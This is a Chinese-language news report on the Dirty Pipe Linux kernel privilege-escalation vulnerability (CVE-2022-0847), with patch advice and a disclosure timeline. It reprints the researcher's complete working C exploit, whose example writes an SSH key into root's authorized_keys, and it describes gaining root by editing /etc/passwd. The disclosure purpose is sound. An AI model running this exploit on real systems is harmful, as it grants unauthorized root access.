來自 CM4all 的安全研究員 Max Kellermann 披露了一個 Linux 內核的高危提權漏洞：臟管道 (Dirty Pipe)。漏洞編號為 CVE-2022-0847。

據介紹，此漏洞自 5.8 版本起就已存在。非 root 用戶通過注入和覆蓋只讀文件中的數據，從而獲得 root 權限。因為非特權進程可以將代碼注入 root 進程。

Max 表示，“臟管道”漏洞與幾年前的“臟牛”類似，所以采用了相似的名字，不過前者更容易被利用。此外，該漏洞目前已被黑客利用，研究人員建議盡快升級版本，Linux 5.16.11、5.15.25 和 5.10.102 均已修復了此漏洞。

Max 在文章中提供了漏洞 PoC。

/* SPDX-License-Identifier: GPL-2.0 */ /*  * Copyright 2022 CM4all GmbH / IONOS SE  *  * author: Max Kellermann   *  * Proof-of-concept exploit for the Dirty Pipe  * vulnerability (CVE-2022-0847) caused by an uninitialized  * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any  * file contents in the page cache, even if the file is not permitted  * to be written, immutable or on a read-only mount.  *  * This exploit requires Linux 5.8 or later; the code path was made  * reachable by commit f6dd975583bd ("pipe: merge  * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was  * there before, it just provided an easy way to exploit it.  *  * There are two major limitations of this exploit: the offset cannot  * be on a page boundary (it needs to write one byte before the offset  * to add a reference to this page to the pipe), and the write cannot  * cross a page boundary.  *  * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'  *  * Further explanation: https://dirtypipe.cm4all.com/  */ #define _GNU_SOURCE #include <unistd.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/stat.h> #include <sys/user.h> #ifndef PAGE_SIZE #define PAGE_SIZE 4096 #endif /**  * Create a pipe where all "bufs" on the pipe_inode_info ring have the  * PIPE_BUF_FLAG_CAN_MERGE flag set.  */ static void prepare_pipe(int p[2])
{ if (pipe(p)) abort(); const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ); static char buffer[4096]; /* fill the pipe completely; each pipe_buffer will now have  the PIPE_BUF_FLAG_CAN_MERGE flag */ for (unsigned r = pipe_size; r > 0;) { unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; write(p[1], buffer, n); r -= n;
  } /* drain the pipe, freeing all pipe_buffer instances (but  leaving the flags initialized) */ for (unsigned r = pipe_size; r > 0;) { unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; read(p[0], buffer, n); r -= n;
  } /* the pipe is now empty, and if somebody adds a new  pipe_buffer without initializing its "flags", the buffer  will be mergeable */ } int main(int argc, char **argv)
{ if (argc != 4) { fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]); return EXIT_FAILURE;
  } /* dumb command-line argument parser */ const char *const path = argv[1]; loff_t offset = strtoul(argv[2], NULL, 0); const char *const data = argv[3]; const size_t data_size = strlen(data); if (offset % PAGE_SIZE == 0) { fprintf(stderr, "Sorry, cannot start writing at a page boundary\n"); return EXIT_FAILURE;
  } const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1; const loff_t end_offset = offset + (loff_t)data_size; if (end_offset > next_page) { fprintf(stderr, "Sorry, cannot write across a page boundary\n"); return EXIT_FAILURE;
  } /* open the input file and validate the specified offset */ const int fd = open(path, O_RDONLY); // yes, read-only! :-) if (fd < 0) { perror("open failed"); return EXIT_FAILURE;
  } struct stat st; if (fstat(fd, &st)) { perror("stat failed"); return EXIT_FAILURE;
  } if (offset > st.st_size) { fprintf(stderr, "Offset is not inside the file\n"); return EXIT_FAILURE;
  } if (end_offset > st.st_size) { fprintf(stderr, "Sorry, cannot enlarge the file\n"); return EXIT_FAILURE;
  } /* create the pipe with all flags initialized with  PIPE_BUF_FLAG_CAN_MERGE */ int p[2]; prepare_pipe(p); /* splice one byte from before the specified offset into the  pipe; this will add a reference to the page cache, but  since copy_page_to_iter_pipe() does not initialize the  "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */ --offset; ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0); if (nbytes < 0) { perror("splice failed"); return EXIT_FAILURE;
  } if (nbytes == 0) { fprintf(stderr, "short splice\n"); return EXIT_FAILURE;
  } /* the following write will not create a new pipe_buffer, but  will instead write into the page cache, because of the  PIPE_BUF_FLAG_CAN_MERGE flag */ nbytes = write(p[1], data, data_size); if (nbytes < 0) { perror("write failed"); return EXIT_FAILURE;
  } if ((size_t)nbytes < data_size) { fprintf(stderr, "short write\n"); return EXIT_FAILURE;
  } printf("It worked!\n"); return EXIT_SUCCESS;
}

據介紹，本地用戶可以將自己的數據注入敏感的只讀文件，消除限制或修改配置以獲得更高的權限。有研究人員通過利用該漏洞修改 /etc/passwd 文件進行了舉例，修改后可直接取消 root 用戶的密碼，然后普通用戶使用 su root 命令即可獲得 root 賬戶的訪問權限。還有研究人員發現，使用 /usr/bin/su 命令刪除 /tmp/sh 中的 root shell 可以更容易獲取 root 權限。

最后，建議各位檢查所使用的 Linux 服務器的內核版本，若是 5.8 以上的版本請盡快升級。

臟管道 (Dirty Pipe) 漏洞時間線：

• 2022-02-20：向 Linux 內核安全團隊發送錯誤報告、漏洞利用和補丁
• 2022-02-21：在 Google Pixel 6 上復現錯誤，并向 Android 安全團隊發送錯誤報告
• 2022-02-21： 按照 Linus Torvalds、Willy Tarreau 和 Al Viro 的建議，將補丁發送到 LKML(不含漏洞詳細信息)
• 2022-02-23：發布包含錯誤修復的 Linux 穩定版本 (5.16.11、5.15.25、5.10.102)
• 2022-02-24：Google 將錯誤修復合并到 Android 內核
• 2022-02-28：通知 linux-distros 郵件列表
• 2022-03-07：公開披露

本文地址：https://www.oschina.net/news/185559/linux-dirty-pipe-vulnerability